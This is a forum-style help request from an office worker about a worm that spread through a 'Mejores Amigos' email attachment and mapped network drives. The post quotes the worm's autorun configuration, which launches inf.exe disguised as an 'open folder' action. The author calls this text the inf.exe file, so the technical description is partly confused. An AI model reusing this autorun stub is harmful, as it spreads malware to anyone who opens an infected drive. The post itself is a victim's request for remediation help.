Got a nasty virus on our network at work yesterday after someone opened a .ZIP file in an email titled “Mejores Amigos”. The code apparently hijackes the users Outlook contacts, grabs some malicous code from the web, then infects the PC and any network drives mapped to the PC, dropping an inf.exe file on all of the mapped drives, which then run the next time someone else uses that drive. Fortunately you have to either access a shared mapped drive for your PC to be infected, or be the genius that opens that email and zip file. It appears to be using MSN Messenger and/or Morpheus to pull the malicious code that starts the problems.
The inf.exe file reads as follows:
[autorun]
open= “inf.exe”
icon= “C:\WINDOWS\system32\SHELL32.dll,8”
action=Abrir carpeta para ver archivos
shell\open=Abrir carpeta para ver archivos
shell\open\command= “inf.exe”
shell\open\default=1
Any assistance would be greatly appreciated!
Thanks,
King